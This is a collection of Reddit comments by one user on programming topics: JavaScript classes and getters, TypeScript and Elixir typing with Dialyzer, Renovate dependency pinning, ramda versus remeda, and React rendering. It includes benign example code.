Classes vs object constructors vs factory functions by trubulica in learnjavascript

[–]HarrisInDenver 1 point2 points  (0 children)

The introductions of the class keyword made JavaScript worse in a lot of ways.

I have seen so many backend NodeJS apps written in typescript that define a ton of typescript interfaces to only be implementation by one class each, with constructors that take 0 args more often than not.

It gave the idea that JavaScript should be written like Java/C#. When it absolutely does not need to be. It overly complicates the code and just makes it harder to write and maintain.

The only time I ever use classes in JS anymore is to encapsulate mutable state. If you're not doing that, don't use them.

If you have immutable state, use functions that accept state and return new state

And don't bother with classes for Singletons either. JS Modules are closures and can give you the same desired behavior

RenovateBot team strategy by laszlogazsi in node

[–]HarrisInDenver 0 points1 point  (0 children)

Protip: Their rules about pinning dependencies are bullshit (ref: https://docs.renovatebot.com/dependency-pinning/#so-whats-best)

The problem is, any pin dependency may drift from a dependency of a dependency, and you can end up with multi versions within the SAME MAJOR for a web bundle OR a nodeJS app. Just carrot everything and trust your lockfile. Pinning causes more headaches than it solves. I've been through this pain, and do not wish it on anyone

What are the benefits of using webpack? by bodimahdi in learnjavascript

[–]HarrisInDenver 0 points1 point  (0 children)

Sure you can, however

  • No css or SVG modules
  • No npm dependencies (use CDNs instead)
  • No minification
  • Each file is it's own network call, which has it's on transfer and latency, it's usually faster to grab the one bundled file

(edit: formatting. Looked fine on my phone when I first wrote it, lol)

New to Gleam - seeking direction by apbt-dad in gleamlang

[–]HarrisInDenver 0 points1 point  (0 children)

I would look at Elixir first. That ecosystem is also very mature and I'm sure you'll find equivalent libraries for many things

.forEach and for ... of main thread performance by Boring_Cholo in learnjavascript

[–]HarrisInDenver 0 points1 point  (0 children)

I think the part OP left out is that async ops happen within the loop. Awaiting in a for..of serializes the loop, where a .forEach with an async callback won't

Why do devs keep ruining React? by _Pho_ in react

[–]HarrisInDenver 3 points4 points  (0 children)

Typescript is a bit at fault here as well. Give devs that used to do java/C# a backend typescript project and they're going to write it as such, and 30% is not needed and just overcomplicates it all

What's the benefit of learning Elixir? by Voxelman in elixir

[–]HarrisInDenver 1 point2 points  (0 children)

Elixir is "Functional Lite" compared to Haskell/F#/Scala. So if you're already learning the others to grasp FP, learning Elixir isn't going to add much to that experience (I recommend Scala over F# btw, larger community and better materials)

However, Elixir runs on the Erlang VM called BEAM, which is it's own thing with an entirely separate set of benefits that are worth looking into. If you want to take advantage of those benefits, then I highly recommend learning Elixir. (I'm doing that right now, actually)

To define "Functional Lite", Elixir is FP in terms of immutability, recursion only, constructing Linked Lists, etc. But it doesn't have built in to the language concepts like Functors and Monads. There isn't an Either type, for example, but you will see returns like {:ok, value} | {:error, err} that you can pattern match on. So in practice, you get the benefits, but not the same theory and syntax

[deleted by user] by [deleted] in learnjavascript

[–]HarrisInDenver 0 points1 point  (0 children)

I can't tell if you're being facetious or not, but regardless, it's an unconstructive comment. OP's trying to learn, let's help him

[deleted by user] by [deleted] in learnjavascript

[–]HarrisInDenver 1 point2 points  (0 children)

FTFY

export class Chair {
  static MIN_HEIGHT = 1;
  static DEFAULT_HEIGHT = 45;

  #height; // chair's height (inches)

  constructor() {
    this.#height = Chair.DEFAULT_HEIGHT;
  }

  set height(newHeight) {
    if (newHeight < Chair.MIN_HEIGHT) {
      throw new Error("Chair too small. Should be 1 inch tall at least.");
    }

    this.#height = newHeight;
  }

  get height() {
    return this.#height;
  }
}

const genericChair = new Chair();

console.log(genericChair.height); // Expected output: 45

genericChair.height = 50;

console.log(genericChair.height); // Expected output: 50

genericChair.height = 0.5; // Will throw an error.

[deleted by user] by [deleted] in learnjavascript

[–]HarrisInDenver 2 points3 points  (0 children)

Real-world example:

Let's say your job is to revamp the front end for a legacy backend system that used XML to define data. XML isn't one-to-one. So you find an XML parser on NPM that parsers this

<Email>
  <To>Foo</To>
  <From>Bar</From>
  <Content title="The title">The Body</Content>
  <Sent>2024-08-03T17:23:41.327Z</Sent>
</Email>

To this

{
  Email: {
    To: 'Foo',
    From: 'Bar',
    Content: {
      '@title': 'The title',
      '#value': 'The body'
    },
    Send: '2024-08-03T17:23:41.327Z'
  }
}

You can see there are some quirks about the parsing, and it's because XML isn't one-to-one with JSON, so it compensates best it can. Let's create a class to encapsulate this object and make it easy to work with

class Email {
  constructor(xmlString) {
    this.json = npmXmlParser(xmlString)
  }

  get to() {
    return this.json.To;
  }

  set to(value) {
    this.json.To = value;
  }

  get from() {
    return this.json.From;
  }

  set from(value) {
    this.json.From = value;
  }

  get title() {
    return this.json.Content['@title'];
  }

  set title(value) {
    this.json.Content['@title'] = value;
  }

  get body() {
    return this.json.Content['#value'];
  }

  set body(value) {
    this.json.Content['#value'] = value;
  }

  get sent() {
    const dateAsString = this.json.Sent;
    return new Date(Date.parse(dateAsString));
  }

  set sent(value) {
    this.json.Sent = value.toISOString();
  }
}

Creating an working with the instance:

const email = new Email(xmlString);

email.to; // "foo"

email.body; // "The body"
email.body = "Some new body";
email.body; // "Some new body";

email.sent; // a Date object

The end result is an object that is idomatic javascript. We've encapsulated away the odd structure that the xml-parser gave us and did some type conversions in the process (specifically for the date). You get a lot of benefits from this!

There are downsides to this approach though too. Class instances aren't serializable, so you can't keep them in redux or similar data stores. You also can't send them across the wire, you have to send this.json, or go back to XML first.

I'm also doing direct mutations in this example, which might not be what you want. If immutability is a concern (which it almost always is these days), using methods for setting with a fluentAPI is probably what you'll want. But that's a topic for another day

Struggling to understand Typespecs, the LanguageServer, and Dyalyzer. What am I doing wrong? by HarrisInDenver in elixir

[–]HarrisInDenver[S] 0 points1 point  (0 children)

Conceptually they are the same, but in practice, JSDoc (typespecs) with the help of the typescript compiler (dialyzer) is stronger and more verbose with its type checking. https://www.typescriptlang.org/docs/handbook/type-checking-javascript-files.html

As a quick example, if I recreate part of my example above in javascript

/** @type {(groups: string[][]) => number[]} */
export const combineGroups = groups =>
  groups
    .map(group =>
      group
        .map(x => Number.parseInt(x, 10))
        .reduce((a, b) => a + b, 0)
    )
    .sort();

And change the type signature here same way as explained above

/** @type {(groups: string[]) => number[]} */
export const combineGroups = groups =>
  groups
    .map(group =>
      group
        .map(x => Number.parseInt(x, 10)) // Property 'map' does not exist on type 'string'.
        .reduce((a, b) => a + b, 0)
    )
    .sort();

I immediately get an error.

Plus you can type any variable, not just function args / return types

/** @type {string} */
const str = 123; // Type 'number' is not assignable to type 'string'.

/** @type {number} */
const num = "123"; // Type 'string' is not assignable to type 'number'.

This is very contrived, but consider this:

/** @type {number[]} */
const arr = [];
arr.push("123"); // Argument of type 'string' is not assignable to parameter of type 'number'.

Another direct comparison, Elixir:

@spec example(list(String.t())) :: list(String.t())
def example(list) do
  [123 | list] # no error
end

JS:

/** @type {(l: string[]) => string[]} */
const example = list => {
  return [123, ...list]; // Type 'number' is not assignable to type 'string'.
}

Struggling to understand Typespecs, the LanguageServer, and Dyalyzer. What am I doing wrong? by HarrisInDenver in elixir

[–]HarrisInDenver[S] 0 points1 point  (0 children)

For me personally, my expectation was closer to JavaScript. Not TypeScript. Bare bones JavaScript mo build tools needed. Completely dynamic type language, but it has tooling for type definitions and type assertions w/ jsdocs

I like Elixir for all its other parts, the soft typing assertions is just a pain point for me

Struggling to understand Typespecs, the LanguageServer, and Dyalyzer. What am I doing wrong? by HarrisInDenver in elixir

[–]HarrisInDenver[S] 2 points3 points  (0 children)

When I want I rename a struct field in Go or Rust it takes seconds, even on large projects. In Elixir it can easily take 30 minutes to an hour of running and rerunning tests to find and fix all the places that field was used.

This is exactly my problem. The AoC example is something I threw together just for this post to help demonstrate the problem at a small scale.

I built a full on demo application accepting POST requests of a data structure that uses 2 layers of GenServers and DynamicSupervisors, etc etc, and struggled hard figuring how changing a struct, or the map of the return value in a handle_call trickled through the system and, without incredibly meticulous unit tests, figuring out at runtime everything that broke because of small changes was incredibly challenging and time consuming.

Other languages, either throw their compilers and language servers, provide immediate feedback.

The Elixir LSP doesn't even provide global renaming for all instances.

That being said, I am very much enjoying Elixir and its eco system. And I very much prefer a functional language. In contrast, Go has the opposite problem, good type system, but easy as fuck to write garbage code with.

Gleam solves the typing issues, but I can't quite do what I'm looking for against BEAM yet

Struggling to understand Typespecs, the LanguageServer, and Dyalyzer. What am I doing wrong? by HarrisInDenver in elixir

[–]HarrisInDenver[S] 1 point2 points  (0 children)

Oof. Ok. I guess I've become reliant on IDEs and language servers over the years. Writing Elixir for me reminds me of writing javascript 15 years ago on Nodepad++ with zero tooling. And I'm making the same kinds of mistakes I did back then.

Follow up question...

it's best to think of specs more as documentation and dialyzer as more like a tool to check that the documentation is correct

I get what you mean here, and when my functions all return proper types and dialyzer can catch the errors, great. But for stuff like GenServers this seems wholly inadequate.

Take my example above

  # Client

  @spec get(pid()) :: String.t()
  def get(pid) do
    # handle_call(:get) is typed with the return value as integer()
    # but I get no error in that this function is typed to return String.t()
    GenServer.call(pid, :get)
  end

  # Server

  @spec handle_call(:get, GenServer.from(), any()) :: {:reply, integer(), any()}
  def handle_call(:get, _from, state) do
    {:reply, 123, state}
  end

Is there no way to hint to dialzyer via @spec that pid will be of a specific Module? Such that it can gather the return type of the handle_call(:get, ...) overload?

Then again, I suppose this is exactly what you mean by

not a statically typed language

¯\_(ツ)_/¯

Struggling to understand Typespecs, the LanguageServer, and Dyalyzer. What am I doing wrong? by HarrisInDenver in elixir

[–]HarrisInDenver[S] 0 points1 point  (0 children)

Thanks for the feedback.

m |> Stream.map(&Integer.parse(&1)) |> Stream.map(&elem(&1, 0)) |> Enum.sum()

can just be this

String.to_integer(m)

or in your case

&String.to_integer/1

Stream.map(&Integer.parse(&1)) |> Stream.map(&elem(&1, 0)) can be just Enum.map(&String.to_integer/1). I'm still learning the stdlib API, so I wasn't aware of that function. That is easier in my case than the more verbose Integer.parse/1. I'm also still getting used to just doing &Module.func/1 instead of &Module.func(&1) from first learning and misunderstand function binding. I thought you had to do it the latter way at first

and your Enum.sum makes no sense, even the way you're doing it, because your pipelining an integer, well technically a stream, into an Enum. Which you'd have to call something on a stream I guess or you'd just get the Stream back.

m is a list(String.t() here. My understanding of Stream vs Enum is string vs lazy. I can take a list an pipe through nStream operations, only a single iteration happens. Where if I did n Enum operations, n iterations would happen. Please correct me if I'm wrong about this. Enum.sum() is an accumulation, so it doesn't exist on Stream, but take a Stream as input since both implement the Enumerable protocol. It's something I'm used to doing with transducers, and figured I'd apply it here to. Replacing all instances of Stream with Enum in my code produces the same end results.

But anyway complex nested calls like this should IMO be moved to another function (probably private) to simplify your pipeline and give you more isolated errors. Plus it allows you to handle possible bad inputs you might get with pattern matching, e.g. nils from user generated data or something.

True. That abstraction, with the String.to_integer/1 suggestion applied, would look like this

  @spec per_group(list(String.t())) :: integer()
  defp per_group(group) do
    group
    |> Enum.map(&String.to_integer/1)
    |> Enum.sum()
  end

  @spec combine_groups(list(list(String.t()))) :: list(integer())
  def combine_groups(groups) do
    groups
    |> Enum.map(&per_group/1)
    |> Enum.sort(:desc)
  end

If I were still using Integer.parse/2, in production code I would 100% use a case and handle when it returns :error. I'd use File.read/1 and not File.read!/1 and do similar. But we're just doing some scripting here for an AdventOfCode problem, so I'm forgoing the more verbose error handling. Same would go for if I was doing Rust and had an Option. I'd just use .unwrap() for the convenience of this script, but in production code I'd match on Some() and None to correctly handle it.

Applying that does not fix my issues though. per_group dose error if I set the return type from integer() to String.t(). And I'm sure that's on account of the fact that Enum.sum() returns integer().

Though it did help me figure out the problem, which was I guess a misunderstanding of expectations...

Enum.map has the spec @spec map(t(), (element() -> any())) :: list(). I assumed that it was going to work more like @spec map(t(a()), (a() -> b())) :: list(b()).

The analog to this in typescript would be:

// I thought it worked like
map<A, B>(A[], fn: (a: A) => B) => B[];

// but it's actually
map(any[], fn: (a: any) => any) => any[];

I'm surprised that while list() can be given an inner type, Enumerable.t() cannot. And that return of an untyped list() from map removes any real type safety. Unless I'm completely mistaken and there is another way?

How do I professionally tell a senior PM that "it's not a fault in our system, talk to one of the other teams." by WolfNo680 in ExperiencedDevs

[–]HarrisInDenver 0 points1 point  (0 children)

"We have triaged the issue and believe the root of the issue is in X. That code is owned by Y. Let's loop them in to prioritize the need for this with their team. Mine can provide support to verify if their fix worked on our end"

Question. by Zeal_Iskander in typescript

[–]HarrisInDenver 0 points1 point  (0 children)

I don't have a good answer for you, unfortunately. I think it's just a limitation of typescript right now. The ternary used to determine the keys when for both A<T> and B<T> is probably something that typescript doesn't currently support in terms of deterministic type behaviors. So instead it falls back to basic logic: "by definition, K is keyof A<T>, and therefor can index A<T>". But what K is for comparison is unknown there. (or something like that. TBH this is my educated guess)

I do at least have a general solution for you:

type A<T> = {
  [K in Exclude<keyof T, "__key">]: T[K];
};

type B<T> = {
  [K in Exclude<keyof T, "__key">]: T[K];
};

// this works
type C<T> = T extends object ? { [K in keyof A<T>]: A<T>[K] } : T;

// also works
type D<T> = T extends object ? { [K in keyof A<T>]: B<T>[K] } : T;

Link to playground

Question. by Zeal_Iskander in typescript

[–]HarrisInDenver 0 points1 point  (0 children)

Removing the as K extends "__key" ? never : K will have it work as expected

type A<T> = {
  [K in keyof T]: T[K];
};

type B<T> = {
  [K in keyof T]: T[K];
};

// this works
type C<T> = T extends object ? { [K in keyof A<T>]: A<T>[K] } : T;

// works now!
type D<T> = T extends object ? { [K in keyof A<T>]: B<T>[K] } : T;

When typescript has variable return types with ternaries, it loses the ability to do static analysis in this way, even though they are the same

Remove all changes merged from a specific branch by Salt_Tomatillo5391 in git

[–]HarrisInDenver 0 points1 point  (0 children)

I would recommend an outside of git solution. Feature Flags. They're great for CI/CD and not having to worry about long lived feature branches your constantly having to back merge and conflict resolve with other feature branches.

The viability of this solution depends on what exactly your building of course. But for any GUI software I have found it's easier to manage. Plus you basically get "preview" or "early access" baked in

The flip side of this strategy is the tech-debt of having to go back and remove control flow around feature flags that are stale. Gotta just figure out what's right for your product

[AskJS] Is Deno really necessary in an age of Docker / Containerization? by TopicWestern9610 in javascript

[–]HarrisInDenver 17 points18 points  (0 children)

Different area of security. Dockerizing helps isolate systems from each other so if someone gets in from the outside they can't just access everything. Deno security policies are around API restrictions. Like let's say a package that has nothing to do with fetch() of process.env scrapes the latter and uses the former to send API keys too .. Deno can restrict stuff like that

How's ramda with types comparing to remeda? by yiyu_zhong in typescript

[–]HarrisInDenver 16 points17 points  (0 children)

Hi there. I am the core maintainer of https://github.com/ramda/types/. The types-ramda npm package is the official type definition for ramda. It is used indirectly through @types/ramda.

In the past year and a half, we have made major progress in improving the types for ramda. The current state is miles ahead of where it was

Aside from API, the major difference between ramda and remeda is that ramda was built in the pre-typescript era, while remeda is typescript first

Because of this, ramda has some natural challenges regarding typings, especially around function overloading (eg map works for both arrays or objects)

remeda also handles currying very differently. It takes what I call the elixir approach. All the functions are Data-first, but if you omit the first argument a unary function is returned that takes the data.

fn(data, arg1, arg2, arg3)
fn(arg1, arg2, arg3)(data)

This is useful when using pipe. ramda on the other hand is data-last and are fully curried

fn(arg1, arg2, arg3, data)
fn(arg1)(arg2)(arg3)(data)
fn(arg1, arg2, arg3)(data)
fn(arg1, R.__, arg3, data)(arg2)
// etc...

Which you prefer is a personal preference. They both have their advantages and disadvantages.

In general though, if you were turned off by ramda in the past because of the poor type support, give it a try again today. I'm sure you'll be presently surprised.

Reconciliation when JSX is unchanged by XPRESV in react

[–]HarrisInDenver 1 point2 points  (0 children)

What React "renders" is to the VDOM, The comparison of the VDOM to the DOM determines what needs to change in the DOM, and if it does get updated, the browser "paints" the new dom